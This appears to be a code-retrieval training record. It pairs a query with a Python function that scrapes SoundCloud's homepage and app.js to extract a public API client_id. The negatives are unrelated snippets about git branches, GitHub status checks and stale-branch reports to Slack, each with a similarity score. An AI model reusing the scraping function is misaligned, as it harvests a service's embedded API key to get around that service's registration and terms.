(highlight(repo.name), highlight(branch.name),\n highlight(\", \".join(list(all_known_checks)))))\n try:\n if existing_checks:\n branch.edit_required_status_checks(strict=True, contexts=list(all_known_checks))\n else:\n safe_branch_edit_protection(\n branch,\n strict=True,\n contexts=list(all_known_checks),\n )\n except GithubException as e:\n print_error(\"Can't edit required status checks on repo %s branch %s: %s\" %\n (repo.name, branch.name, str(e)))\n return change.failure()\n return change.success()\n\n prb = get_pr_branch(repo, branches)\n if not prb:\n return []\n\n existing_checks = set() # type: Set[str]\n try:\n rqs = prb.get_required_status_checks()\n except GithubException:\n # the repository has currently no status checks\n 
pass\n else:\n if len(rqs.contexts) > 0:\n # The repository already has some status checks\n existing_checks = set(rqs.contexts)\n print_debug(\"Branch %s on repo %s already has status checks [%s]\" %\n (highlight(prb.name), highlight(repo.name), highlight(\", \".join(existing_checks))))\n\n # the repository currently has no status checks, let's see if any came in within the last 7 days\n sevendaysago = datetime.now() - timedelta(days=7)\n commits = repo.get_commits(prb.name, since=sevendaysago)\n known_status_checks = set() # type: Set[str]\n known_checkruns = set() # type: Set[str]\n for commit in commits:\n for status in commit.get_statuses(): # type: CommitStatus\n if status.context not in known_status_checks:\n print_debug(\"New status check [%s]: %s %s '%s'\" %\n (commit.sha, status.updated_at,\n status.context, status.description))\n known_status_checks.add(status.context)\n for checkrun in commit.get_check_runs(): # type: CheckRun\n if checkrun.name not in known_checkruns:\n print_debug(\"New check run [%s]: %s %s %s\" %\n (commit.sha, checkrun.completed_at, checkrun.name, checkrun.app))\n known_checkruns.add(checkrun.name)\n\n all_known_checks = known_status_checks | known_checkruns # For convenience later to treat them as a single set\n print_debug(\"Found status checks [%s]\" % \", \".join(all_known_checks))\n\n if all_known_checks and all_known_checks != existing_checks:\n # add all known checks as required checks\n print_debug('Adding checks [%s] to branch %s on repo %s' %\n (highlight(\", \".join((all_known_checks) - existing_checks)),\n highlight(prb.name), highlight(repo.name)))\n return [Change(\n meta=ChangeMetadata(\n executor=execute_test_protection,\n params=[prb, existing_checks, known_status_checks, known_checkruns]\n ),\n action=ChangeActions.REPLACE if existing_checks else ChangeActions.ADD,\n before=\"%s checks\" % len(existing_checks) if existing_checks else \"No checks\",\n after=\"%s checks\" % len(all_known_checks),\n )]\n return []", "def check_component(comp_name: str, comp: defs.Component) -> None:\n if not RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)", "def test_multi_branches(self):\n sgf = \"\"\"\n (;FF[4]GM[1]SZ[19];B[aa];W[bb](;B[cc];W[dd](;B[ad];W[bd])\n (;B[ee];W[ff]))\n (;B[hh];W[gg])\n (;B[ii];W[jj]))\n \"\"\"\n coll = parseSgf(sgf)\n self.assertEqual(coll,\n [[{'SZ': '19', 'GM': '1', 'FF': '4'}, {'B': 'aa'},\n {'W': 'bb'},\n [[{'B': 'cc'}, {'W': 'dd'}, [[{'B': 'ad'}, {'W': 'bd'}], [{'B': 'ee'}, {'W': 'ff'}]]],\n [{'B': 'hh'}, {'W': 'gg'}],\n [{'B': 'ii'}, {'W': 'jj'}]],\n ]])\n self.assertEqual(self._trim_sgf_whitespace(sgf), makeSgf(coll))", "def formatted_branch_name(branch):\n for exp in experiments:\n if exp in branch:\n for otype in observation_types:\n if otype in branch:\n for stype in shear_types:\n if stype in branch:\n return exp+'-'+otype+'-'+stype\n raise RuntimeError('Branch %s does not appear to be a valid branch name--please pass one of '\n '[%s] with the command-line option -b.'%(branch, ', '.join(branch_names)))", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to 
release, you are on %s\" % (expected_branch, branch))", "def check_children_attributes(self, branch):\n attributes = branch.get_attributes()\n for attr in attributes:\n if not isinstance(attributes[attr], str) and not isinstance(attributes[attr], list) :\n print('Attribute '+str(attr)+' of '+ branch.__class__.__name__ + ' should be str or list')\n self.assertTrue(False)\n children = branch.get_children()\n for child in children:\n self.check_children_attributes(child)", "def verify_tags(git_ref_target):\n latest_release = github_util.get_latest_release().get('name')\n latest_commit = run('git rev-list -n 1 {}'.format(latest_release)).stdout.rstrip(\"\\r\\n\")\n if not branch_check(latest_release, git_ref_target):\n print('Your branch does not contain the latest production code. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print(\"Branch contains the latest production tag\")\n fork_point = run('git merge-base remotes/origin/master remotes/origin/{}'.format(git_ref_target))\n commits_since_fork = run('git rev-list --branches={} {}^..HEAD'.format(git_ref_target,\n fork_point.stdout.rstrip(\"\\r\\n\")))\n if latest_commit not in commits_since_fork.stdout:\n print('Your branch did not fork directly from the last production tag. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print('Latest production tag is between the fork point and HEAD')", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def verify_submissions_valid() -> bool:\n\n submitters = [file for file in os.listdir(SUBS_DIR) if not file.startswith(\".\")]\n submissions_valid = True\n\n for submitter in submitters:\n expected_submission_path = f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\"\n if not os.path.exists(expected_submission_path):\n print(f\"{Ansi.RED}ERROR:{Ansi.END} {expected_submission_path} does not exist\")\n submissions_valid = False\n continue\n else:\n git = subprocess.run(\"git remote -v\", shell=True, cwd=expected_submission_path, stdout=subprocess.PIPE,\n universal_newlines=True, check=False)\n if ASSIGNMENT not in git.stdout:\n print(f\"{Ansi.RED}ERROR:{Ansi.END} {expected_submission_path} does not contain a git history\")\n submissions_valid = False\n\n return submissions_valid", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. 
bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def check_stale_branches(event: dict, context) -> dict:\n\n ssm_parameters = load_params('dev_tools', 'dev')\n\n if 'jira_statuses_for_task_completion' in ssm_parameters and ssm_parameters['jira_statuses_for_task_completion']:\n jira_statuses_for_task_completion = ssm_parameters['jira_statuses_for_task_completion']\n else:\n jira_statuses_for_task_completion = ('Resolved', 'Closed')\n\n repository_names = ssm_parameters['github_repository_names']\n github_repository_names = repository_names.split(',')\n\n jira_oauth_dict = {\n 'access_token': ssm_parameters['jira_access_token'],\n 'access_token_secret': ssm_parameters['jira_access_token_secret'],\n 'consumer_key': ssm_parameters['jira_consumer_key'],\n 'key_cert': ssm_parameters['jira_private_key']\n }\n auth_jira = JIRA(ssm_parameters['jira_url'], oauth=jira_oauth_dict)\n\n # Github authentication setup\n g = Github(ssm_parameters['github_access_token'])\n\n # Look for stale branches for all the specified repos\n total_stale_branches = 0\n general_report = ''\n author_count = defaultdict(int)\n\n for repo_name in github_repository_names:\n logger.debug(f'\\nChecking repo: {repo_name}')\n\n try:\n repo = g.get_repo(f\"{ssm_parameters['github_account']}/{repo_name}\")\n except GithubException:\n logger.error(f\"Github repository '{ssm_parameters['github_account']}/{repo_name}' not found!\")\n continue\n\n repo_report = ''\n\n # confirm the name for the main develop branch\n main_develop_branch = 'develop'\n try:\n _ = repo.get_branch('develop')\n except GithubException:\n main_develop_branch = 'master'\n logger.debug('Develop branch not found, using master as the main develop branch.')\n continue\n\n branches = repo.get_branches()\n for branch in branches:\n # only check feature and hotfix branches\n if not branch.name.startswith('feature/') and not branch.name.startswith('hotfix/'):\n continue\n\n # compare the branch against the main develop branch\n try:\n comparison = repo.compare(main_develop_branch, branch.name)\n except GithubException as error:\n logger.error(f'GithubException: Error while trying to compare {main_develop_branch} and {branch.name}.')\n logger.error(f'GithubException: {error}.')\n\n if comparison.behind_by == 0:\n # the branch is up to date, nothing to do\n continue\n\n # try to get the jira ticket number from the branch name\n ticket = None\n result = re.search(r'feature/(?P<ticket>[a-zA-Z]+-[0-9]+).*', branch.name)\n if result:\n ticket = result.groupdict()['ticket'].upper()\n try:\n issue = auth_jira.issue(ticket)\n except jira_exceptions.JIRAError:\n logger.debug(f\"The ticket 
{ticket} specified in the branch name doesn't exist in Jira.\")\n\n if issue and issue.fields.status.name not in jira_statuses_for_task_completion:\n # the issue hasn't been marked as resolved in jira, so the branch may still be needed\n continue\n\n author = branch.commit.author.login if branch.commit.author else 'unknown'\n author_count[author] += 1\n repo_report += f'Branch: {branch.name}\\nComparison status: {comparison.status}\\nAuthor: {author}\\n'\n if ticket:\n repo_report += f'Ticket status: \"{issue.fields.status.name}\\n'\n repo_report += '\\n'\n\n total_stale_branches += 1\n\n if repo_report:\n general_report += f'Repo: {repo_name}, develop branch name: {main_develop_branch}\\n{repo_report}'\n\n if total_stale_branches:\n count_by_author = ''\n for author, count in sorted(author_count.items(), key=operator.itemgetter(1), reverse=True):\n count_by_author += f'{author}: {count}\\n'\n\n report_overview = f'Current number of stale branches: {total_stale_branches}\\n\\n'\\\n f'Count by author:\\n{count_by_author}\\n'\n report_details = f'Details:\\n\\n{general_report}'\n\n _ = slack_request(url=ssm_parameters['slack_webhook_url'],\n headers={'Content-type': 'application/json',\n 'Authorization': f\"Bearer {ssm_parameters['slack_access_token']}\"},\n data=json.dumps({'text': report_overview})\n )\n\n _ = slack_request(url='https://slack.com/api/files.upload',\n headers={'Content-type': 'application/x-www-form-urlencoded'},\n data={'token': ssm_parameters['slack_access_token'],\n 'channels': 'GE8NS0FT5',\n 'content': report_details,\n 'title': 'Stale branches details'}\n )", "def remove_all_status_checks_on_pr_branch(org: Organization, repo: Repository,\n branches: Dict[str, Branch]) -> List[Change[str]]:\n def execute_remove_all_status_checks(change: Change[str], branch: Branch, existing_checks: Set[str]) -> Change[str]:\n print_debug(\"Removing all status checks from branch %s\" % highlight(branch.name))\n try:\n if existing_checks:\n branch.remove_required_status_checks()\n except GithubException as e:\n print_error(str(e))\n return change.failure()\n else:\n return change.success()\n\n prb = get_pr_branch(repo, branches)\n if not prb:\n return []\n\n try:\n rqs = prb.get_required_status_checks()\n except GithubException:\n # the repository has currently no status checks\n pass\n else:\n if len(rqs.contexts) > 0:\n existing_checks = set(rqs.contexts) # type: Set[str]\n return [Change(\n meta=ChangeMetadata(\n executor=execute_remove_all_status_checks,\n params=[prb, existing_checks]\n ),\n action=ChangeActions.REPLACE,\n before=\"%s checks\" % len(existing_checks),\n after=None,\n )]\n return []", "def check(user_configuration, repository_configuration, commit_message):\n logger = output.get_sub_logger('commit-msg', 'branch-pattern')\n\n logger.debug('Starting branch-pattern check...')\n\n result = checks.CheckResult()\n branch = commit_message.branch\n logger.debug('Branch: %s', branch)\n\n check_options = repository_configuration.get('branch-pattern', {})\n allowed = check_options.get('allowed', [])\n allowed.append('master') # master is always allowed\n\n logger.debug('Allowed Patterns: %s', allowed)\n\n is_allowed = any(re.match(pattern, branch) for pattern in allowed)\n result.successful = is_allowed\n if not is_allowed:\n template = \"{branch} doesn't match any allowed pattern.\"\n result.add_detail(template.format(branch=branch))\n\n return result", "def test_multiple_branches(self, tmpgitdir):\n with tmpgitdir.join('file_a.txt').open('w') as handle:\n handle.write('first 
file')\n\n subprocess.check_call(['git', 'add', '.'])\n subprocess.check_call(['git', 'commit', '-m', 'first'])\n\n subprocess.check_call(['git', 'checkout', '-b', 'testbranch'])\n\n with tmpgitdir.join('file_b.txt').open('w') as handle:\n handle.write('second file')\n\n subprocess.check_call(['git', 'add', '.'])\n subprocess.check_call(['git', 'commit', '-m', 'second'])\n\n assert git_head_ref_name(tmpgitdir) == 'testbranch'", "def verify_up_to_date(path, branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch up to date:\")\n run_in_component(path, ['git', 'remote', 'update'])\n\n result = run_in_component(path, ['git', 'rev-list', 'HEAD...origin/%s' % branch, '--count'])\n count = int(result.strip())\n\n if count == 0:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You branch is not up-to-date with remote branch: %d different commits\" % count)", "def scm_branch(self, value):\n max_characters = 256\n conditions = [validate_max_length(value, max_characters)]\n if all(conditions):\n self._update_values('scm_branch', value)\n else:\n raise InvalidValue(f'{value} is invalid. Condition max_characters must be less than or equal to '\n f'{max_characters}')" ]
[ "0.6998986", "0.66559356", "0.64833444", "0.6398546", "0.62924314", "0.6202438", "0.6100306", "0.6061971", "0.60214883", "0.5950823", "0.57404685", "0.5680982", "0.56484795", "0.5646791", "0.56122196", "0.5460472", "0.5450381", "0.54337895", "0.5420128", "0.54145825", "0.54026216", "0.53585887", "0.5280357", "0.5276135", "0.5269761", "0.51807344", "0.51750624", "0.51746446", "0.51634026", "0.5158866" ]
0.838676
0
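Taken together, `branch_exists`, `is_nametag_reachable` and `valid_branches` implement a simple graph check: every branch except the special "start" branch needs an incoming edge, and every outgoing edge must point at an existing branch. A sketch of both outcomes, with `SimpleNamespace` again standing in for the unshown branch class:

```python
from types import SimpleNamespace as B  # hypothetical stand-in for the real branch class

good = {
    "start": B(name="start", next_nametags=["end"]),
    "end":   B(name="end",   next_nametags=[]),
}
bad = {
    "start":    B(name="start", next_nametags=["missing"]),  # dangling edge
    "orphaned": B(name="orphaned", next_nametags=[]),        # nothing ever reaches it
}

# valid_branches(good) -> True
# valid_branches(bad)  -> False  (dangling edge and an unreachable branch)
```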
Small helper for writing to stdout and flushing it, intended to make terminal output more compact and responsive.
def stdout(msg): sys.stdout.write(msg) sys.stdout.flush()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pflush(*args, **kwargs):\n print(*args, **kwargs)\n sys.stdout.flush()", "def write(msg, newline=True, flush=True):\n sys.stdout.write(msg)\n if newline:\n sys.stdout.write(\"\\n\")\n if flush:\n sys.stdout.flush()", "def print_flush(msg):\n print(msg, end='')\n sys.stdout.flush()", "def _write_and_flush(self, data):\n try:\n self.stdout.write(data)\n self.stdout.flush()\n except IOError as e:\n if e.args and e.args[0] == errno.EINTR:\n # Interrupted system call. Can happpen in case of a window\n # resize signal. (Just ignore. The resize handler will render\n # again anyway.)\n pass\n else:\n raise", "def stdout_write(string):\n\tsys.stdout.write(string)\n\tsys.stdout.flush()\n\t\n\treturn None", "def nostdout():\n\n save_stdout = sys.stdout\n sys.stdout = cStringIO.StringIO()\n yield\n sys.stdout = save_stdout", "def print_stdout(command):\n sys.stdout.write(\"%s\\n\" % command)\n sys.stdout.flush()", "def flush_print(string):\n print(string)\n sys.stdout.flush()", "def redirect_stdout():\n save_stdout = sys.stdout\n sys.stdout = _TQDMFile(sys.stdout)\n yield\n sys.stdout = save_stdout", "def StdOut(self, message):\n sys.stdout.write('{0:s}\\n'.format(message))\n sys.stdout.flush()", "def flush(self) -> None:\n if not self._buffer:\n # Only flush stdout buffer. (It could be that Python still has\n # something in its buffer. -- We want to be sure to print that in\n # the correct color.)\n self.stdout.flush()\n return\n\n data = \"\".join(self._buffer)\n\n if _DEBUG_RENDER_OUTPUT:\n self.LOG.write((\"%r\" % data).encode(\"utf-8\") + b\"\\n\")\n self.LOG.flush()\n\n # Print characters one by one. This appears to be the best solution\n # in order to avoid traces of vertical lines when the completion\n # menu disappears.\n for b in data:\n written = DWORD()\n\n retval = windll.kernel32.WriteConsoleW(\n self.hconsole, b, 1, byref(written), None\n )\n assert retval != 0\n\n self._buffer = []", "def flush(self):\n if self.stderr:\n sys.__stderr__.flush()\n else:\n sys.__stdout__.flush()", "def flush(self):\n self.old_stdout.flush()", "def tprint(msg):\n sys.stdout.write(msg + '\\n')\n sys.stdout.flush()", "def tprint(msg):\n sys.stdout.write(msg + '\\n')\n sys.stdout.flush()", "def console_print(out, *args, **kwargs):\n const_charset = stream_encoding(out)\n out.write(' '.join([a.encode(cons_charset, 'replace') for a in args]))\n if kwargs.get('newline', True):\n out.write('\\n')", "def write(self, *args, **keys):\n output = self.format(*args, **keys)\n self.eol_pending = not output.endswith(\"\\n\")\n sys.stderr.flush()\n sys.stdout.write(output)\n sys.stdout.flush()", "def out(self, output, newline=True):\r\n self.stdout.write(output)\r\n if newline:\r\n self.stdout.write(os.linesep)", "def write(string):\n\n\tsys.stdout.write(string)\n\tsys.stdout.flush()", "def write_stdout(self, data):\n filt, handler = self.filter[-1]\n data, filtered = filt.filter(data)\n self._write(pty.STDOUT_FILENO, data)\n if filtered:\n self.log(\"Filter matched %d bytes\" % len(filtered))\n self.filter.pop()\n assert callable(handler)\n res = handler(filtered)\n if res:\n self.sock.sendto(res, 0, self.last_addr)", "def output(text):\n sys.stdout.write(text)", "def _dumpStdout(self, p, outputCallback):\n while p.poll() is None:\n try:\n # May raise IOError if in non-blocking mode\n l = p.stdout.read()\n outputCallback(l)\n except IOError:\n pass\n time.sleep(0.1)\n outputCallback(p.stdout.read())", "def printnflush(*args):\n if pyscheduler.verbose:\n print args\n sys.stdout.flush()", "def 
printer(end,message):\n\n sys.stdout.write('\\r'+message+'\\t')\n sys.stdout.flush()\n if end: sys.stdout.write('\\n')", "def _flush():\n libtcod.console_flush()", "def write(self, text):\n text = text.rstrip()\n self.fh.write('%s\\n' % (text))\n self.old_stdout.write('%s\\n' % (text))", "def write_to_terminal(self, term=None, endl=False):\n if term is None:\n term = Terminal()\n with terminal_lock:\n self._print(term)\n if endl:\n term.newline()\n term.flush()", "def write(self, text: str) -> None:\n # similar to tqdm.write()\n # https://pypi.python.org/pypi/tqdm#writing-messages\n with self._stdout_lock:\n self._clear_line()\n if isinstance(text, (str, bytes)):\n _text = to_unicode(text)\n else:\n _text = str(text)\n sys.stdout.write(f\"{_text}\\n\")\n self._cur_line_len = 0", "def enable(self):\n self.out = StringIO()\n self._stdout = sys.stdout\n sys.stdout = self.out", "def flush(self) -> None:\r\n if self.file is not None:\r\n self.file.flush()\r\n\r\n self.stdout.flush()" ]
[ "0.7578872", "0.7356564", "0.7139393", "0.7095517", "0.7022346", "0.67478865", "0.67162675", "0.6707451", "0.6658429", "0.66203755", "0.65573883", "0.6525697", "0.64456743", "0.64306766", "0.64306766", "0.6427846", "0.6423618", "0.6415727", "0.640634", "0.63921225", "0.6329775", "0.6319898", "0.62864125", "0.62707895", "0.6192294", "0.61654764", "0.6155158", "0.61168844", "0.61049473", "0.60879385" ]
0.74203354
1
Fetches the soundcloud.com main page, looks for the 'app' js file and tries to pull a client_id out of that. Returns None on failure or a string client_id on success.
def find_client_id(): stdout("Attempting to fetch a public soundcloud client ID:\n") stdout(" * Fetching main page... ") response = requests.get("http://www.soundcloud.com") stdout("HTTP %d, %d bytes\n" % (response.status_code, len(response.content))) stdout(" * Locating app.js... ") app_js_urls = re.findall("\"(http.+?[^\"]+?/app-.+?js)", response.content) stdout("found %d URLs that may be app.js.\n" % len(app_js_urls)) if len(app_js_urls) == 0: return None else: for url in app_js_urls: stdout(" * Fetching %s... " % url) response = requests.get(url) stdout("HTTP %d, %d bytes\n" % (response.status_code, len(response.content))) stdout(" * Searching for a client id... ") open("/tmp/appjs", "w").write(response.content) # Try to pick out the value for client_id, not including quotes, # anywhere in the JavaScript and do a little length sanity # checking on it. m = re.search("client_id:\"(.{16,128}?[^\"])\"", response.content) if m is None: stdout("failed!\n") return None else: client_id = m.group(1) stdout("got one! '%s'\n" % client_id) return client_id
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_client():\n client = soundcloud.Client(client_id=CLIENT_ID)\n return client", "def client_app_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"client_app_id\")", "def check_soundcloud_id(id):\n c_url = ''\n\n try:\n page = sync.get_page(SOUNDCLOUD_BASE_URL + str(id))\n except (HTTPError, URLError) as e:\n return c_url, e.code\n \n code = None\n if page:\n html = BeautifulSoup(page, 'html.parser')\n data = html.find('link', {'rel': 'canonical'})\n c_url = data['href']\n code = 200 # successful request\n\n return c_url, code", "def get_id(html):\n\ttry:\n\t\tsong_id = re.findall('soundcloud://sounds:(.*?)\"', html)[0]\n\t\treturn song_id\n\texcept IndexError:\n\t\tprint(\"\\033[91m✘ Could not find song ID\\033[0m\")\n\t\tsys.exit()", "def getAppId(server, appName, oper = 0, fileName = 'data/jsonAPPinfo.dat'):\n if oper == 0:\n JSONdata = urllib2.urlopen(url=server+\"/api/app?short_name=\"+ \\\n appName).read()\n data = json.loads(JSONdata)\n with open(fileName,'w') as outfile:\n json.dump(data, outfile)\n outfile.close()\n elif oper == 1:\n with open(fileName,'r') as outfile:\n data = json.load(outfile)\n outfile.close()\n appId = data[0]['id']\n return appId", "def get_app(args):\n logging.info(\"Getting the APP...\")\n\n try:\n if args.app_path is not None and os.path.exists(args.app_path):\n logging.info(\"Getting APP from local path '{PATH}'...\".format(PATH=args.app_path))\n app_path = args.app_path\n\n elif args.file_id is not None:\n logging.info(\"Downloading APP from Google Drive...\")\n download_file_from_google_drive(GDRIVE_API_CREDENTIALS_JSON, args.file_id, APP_ARCHIVE)\n logging.info(\"Unzipping archive with the APP file...\")\n app_path = unzip_archive(APP_ARCHIVE)\n\n else:\n logging.error(\"No valid app path provided.\")\n return None\n\n logging.info(\"App retrieved successfuly: '{PATH}'\".format(PATH=app_path))\n return app_path\n\n except Exception as e:\n logging.error(\"Error getting the app: '{ERROR}'.\".format(ERROR=e))\n return None", "def load_portal_client():\n # return globus_sdk.ConfidentialAppAuthClient(\n # app.config['PORTAL_CLIENT_ID'], app.config['PORTAL_CLIENT_SECRET'])\n return globus_sdk.ConfidentialAppAuthClient(\n app.config['PORTAL_CLIENT_ID'], app.config['PORTAL_CLIENT_SECRET'])", "def get_from(url):\r\n try:\r\n with current_app.app_context():\r\n r = requests.get(url, timeout=current_app.config[\"TIMEOUT\"])\r\n if r.status_code == 200:\r\n return r.json()\r\n return None\r\n except:\r\n return None", "def app_id(self):\n return self._app_id or self._modules['default'].data.get('application')", "def get_app(self, app_id):\n return req(self.logger, self.access_token, 'GET', '/apps/'+app_id, {})", "def _get_oembed(self, url):\n api_url = 'http://www.soundcloud.com/oembed/?url=%s&format=json' % (url)\n return self._oembed_request(api_url)", "def get_homepage(resource):\n return resource.playlist.consumer_site.domain", "def getScriptForApp(app):\n\n script = None\n if _currentPresentationManager >= 0:\n script = \\\n _PRESENTATION_MANAGERS[_currentPresentationManager].getScript(app)\n return script", "def appid(self):\n return self._item[\"appid\"]", "def get_client_script(t2_url, t2_token, id):\n response = requests.get(f\"{t2_url}/api/clusters/{id}/stackable-client-script\", headers={ \"t2-token\": t2_token })\n if(response.status_code != 200):\n log(f\"API call to get Stackable client script returned error code {response.status_code}\")\n return None\n return response.text", "def find_player_id(url):\r\n response = 
requests.get(url)\r\n result = PLAYER_ID_PATTERN.search(response.text)\r\n return result.group(1)", "def sso_client_id(self) -> Optional[str]:\n return pulumi.get(self, \"sso_client_id\")", "def get_client_id():\n\n return str(get_account().Get(GOA_ACCOUNT_OAUTH2, 'ClientId',\n dbus_interface=PROPERTIES))", "def get_sound_cloud_user(handler):\n user_id = handler.get_argument('user_id')\n sound_cloud_client = Petitions.instantiate_user(user_id)\n current_user = sound_cloud_client.get('/me').username\n return current_user # Improve messages. Change to Json", "def _DefaultAppId():\n return os.getenv('APPLICATION_ID', '_')", "def get_client_id() -> str:\n from .util import get_env_value, is_env_key\n client_id = cfg.client_id\n if is_env_key(client_id):\n value = get_env_value(client_id)\n if value is None:\n print(f'could not get CLIENT_ID from environment with key: {client_id[4:]}')\n input('\\npress enter to exit...')\n exit(1)\n return value\n return client_id", "def aad_client_id(self) -> Optional[str]:\n return pulumi.get(self, \"aad_client_id\")", "async def get_app(self, app_id: str) -> dict:\r\n return await self.get(API_APP.format(app_id=app_id))", "def get_id_from_url(url):\n doc_id_regex = r'.*docsend.com/view/(?P<doc_id>.*)'\n search = re.search(doc_id_regex, url)\n if search:\n doc_id = search.group('doc_id')\n return doc_id", "def _get_login_oauth_client():\n login_client_id = settings.JWT_AUTH['JWT_LOGIN_CLIENT_ID']\n try:\n return Application.objects.get(client_id=login_client_id)\n except Application.DoesNotExist:\n raise AuthFailedError( # lint-amnesty, pylint: disable=raise-missing-from\n f\"OAuth Client for the Login service, '{login_client_id}', is not configured.\"\n )", "def display_app_info(config, client, app_id):\n try:\n resp = client.get_app_full_info(config.username, app_id)\n result = resp.json()\n app_info = result[\"app_info\"]\n title = click.style(\"App Name : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"title\"]))\n\n if app_info[\"rating_count\"] == 0:\n rating = \"Not yet rated\"\n else:\n rating = \"{:.1f} ({} rating\".format(app_info[\"average_rating\"],\n int(app_info[\"rating_count\"]))\n if app_info[\"rating_count\"] > 1:\n rating += \"s\"\n rating += \")\"\n rating_row = click.style(\"Rating : \", fg=\"blue\") + click.style(\"{}\".format(rating))\n up_status = click.style(\"Status : \", fg=\"blue\")\n if app_info[\"is_up\"]:\n up_status += click.style(\"Up\")\n else:\n up_status += click.style(\"Down\")\n\n last_crawl_str = \"Not yet crawled\"\n if \"last_crawl\" in app_info:\n last_crawl_str = util.format_date(app_info[\"last_crawl\"])\n\n last_crawl = click.style(\"Last Crawl Time : \", fg=\"blue\") + click.style(\n \"{}\".format(last_crawl_str))\n version = click.style(\"Version : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"version\"]))\n\n last_updated_str = util.format_date(app_info[\"updated\"])\n last_update = click.style(\"Last Update : \", fg=\"blue\") + click.style(\n \"{}\".format(last_updated_str))\n\n availability = click.style(\"Availability : \", fg=\"blue\") + click.style(\n \"{:.2f}%\".format(app_info[\"average_uptime\"] * 100))\n\n app_url = click.style(\"Public App URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"app_url\"]))\n original_url = click.style(\"Private App URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"original_url\"]))\n category = click.style(\"Category : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"category\"]))\n\n desc = 
click.style(\"Description : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"description\"]))\n price = click.style(\"Price Range : \", fg=\"blue\") + click.style(\n \"{} - {} Satoshis\").format(\n app_info[\"min_price\"], app_info[\"max_price\"])\n doc_url = click.style(\"Docs URL : \", fg=\"blue\") + click.style(\n \"{}\".format(app_info[\"docs_url\"]))\n\n quick_start = click.style(\"Quick Start\\n\\n\", fg=\"blue\") + click.style(\n app_info[\"quick_buy\"])\n\n usage_docs = None\n if \"usage_docs\" in app_info:\n usage_docs = click.style(\"Detailed usage\\n\\n\", fg=\"blue\") + click.style(\n app_info[\"usage_docs\"])\n\n page_components = [title, \"\\n\",\n rating_row, up_status, availability, last_crawl, last_update, version,\n \"\\n\",\n desc, app_url, original_url, doc_url, \"\\n\",\n category, price, \"\\n\", quick_start, \"\\n\"]\n if usage_docs:\n page_components.append(usage_docs + \"\\n\")\n final_str = \"\\n\".join(page_components)\n logger.info(final_str, pager=True)\n\n except ServerRequestError as e:\n if e.status_code == 404:\n logger.info(\n \"The specified id for the app ({}) does not match any apps in the \"\n \"marketplace.\".format(app_id))\n else:\n raise e", "def current_user_id(data_client):\n try:\n return data_client.current_user().id\n except tk.HTTPError as error:\n skip_or_fail(tk.HTTPError, \"ID of current user could not be retrieved!\", error)", "def getApp(appName):\n logger.debug('[FLASKWEB /apps/<appName>] GET request for app, `%s`' % appName)\n applist = [a['name'] for a in db.getAllApps()]\n if appName in applist:\n versionList = db.getVersions(appName)\n if request.headers['Accept'] == 'application/json':\n return jsonify(dict(name=appName, versions=versionList)), 200\n else:\n return render_template(\"apps.html\", name=appName, versionList=versionList)\n else:\n return returnError(\"Application %s does not exist\" % appName, 404)", "def app_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"app_id\")", "def client_id(self) -> str:\n return pulumi.get(self, \"client_id\")" ]
[ "0.58945185", "0.5666564", "0.54652476", "0.5451408", "0.539826", "0.5342123", "0.53111964", "0.5309336", "0.528899", "0.52842605", "0.5255024", "0.5202958", "0.5173291", "0.5158253", "0.5108697", "0.5082016", "0.50815004", "0.50447154", "0.50221217", "0.49919608", "0.49895084", "0.49629664", "0.49581122", "0.49481586", "0.49434212", "0.49398753", "0.493413", "0.49262598", "0.49159274", "0.49097872" ]
0.8254922
0
